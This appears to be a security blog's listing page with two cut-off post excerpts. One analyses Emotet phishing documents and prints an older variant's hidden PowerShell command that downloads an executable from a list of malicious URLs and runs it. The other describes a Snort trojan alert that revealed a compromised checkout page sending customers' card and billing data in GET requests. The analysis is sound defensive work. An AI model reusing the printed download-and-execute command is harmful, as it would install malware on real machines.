Security Magic

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection. This used to be very simple to see, for example, older observed variants produced the following powershell: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and have come across a website which just seems a bit off. Yesterday I received a Snort alert which I often see on a compromised host:>ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with users Credit Card and Billing information in the Request Header. See Screenshot: I've excluded the rest of the transcript, so as not to mention the site which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for Building supplies. When looking at the websites Checkout page, I stumbled upon the following code: Click to...